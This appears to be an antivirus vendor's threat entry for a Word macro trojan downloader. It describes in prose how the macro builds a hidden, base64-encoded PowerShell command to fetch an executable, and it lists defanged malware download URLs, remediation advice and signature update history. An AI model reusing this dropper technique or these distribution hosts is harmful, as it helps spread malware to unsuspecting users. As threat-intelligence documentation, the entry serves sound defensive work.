VBA/Agent.IP!tr.dldr
Analysis
VBA/Agent.IP!tr.dldr is a generic detection for a trojan.
Since this is a generic detection, malware that are detected as VBA/Agent.IP!tr.dldr may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- It is a Microsoft Word macro.
- It uses VBA to create a Powershell command encoded in base64 and executes it in hidden mode.
- It employs a large amount of string manipulations to obsfucate the code.
- The Powershell script will attempt to connect to multiple sites to download a file called: 857.exe.
- At the time this virus description is written (Jan. 14, 2020), the sites the malware connects to no longer supply the executable.
- The malware attempts to connect to the following sites to download the executable:
- hxxps://www.the36th[REMOVED].com/og/rpTZZdQ/
- hxxps://travel[REMOVED]dmc.com/wp-content/wCEvisiZ/
- hxxp://cause[REMOVED]life.org/wp-content/plugins/p12-d5zgmuvbcp-033/
- hxxps://adanz[REMOVED]api.com/giqn/8oz-hj46asp-799/
- hxxps://dapper[REMOVED].xyz/calendar/DbdSQsr/
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
FortiClient | |
FortiAPS | |
FortiAPU | |
FortiMail | |
FortiSandbox | |
FortiWeb | |
Web Application Firewall | |
FortiIsolator | |
FortiDeceptor | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2021-02-23 | 84.00249 | |
2020-11-24 | 82.07600 | Sig Updated |
2020-10-13 | 81.06700 | Sig Updated |
2020-09-01 | 80.05600 | Sig Updated |
2020-03-04 | 75.71900 | Sig Updated |
2019-12-04 | 73.55900 | Sig Updated |
2019-12-02 | 73.50900 | Sig Updated |
2019-12-02 | 73.49500 | Sig Updated |
2019-12-02 | 73.49300 | Sig Updated |
2019-10-11 | 72.25800 | Sig Updated |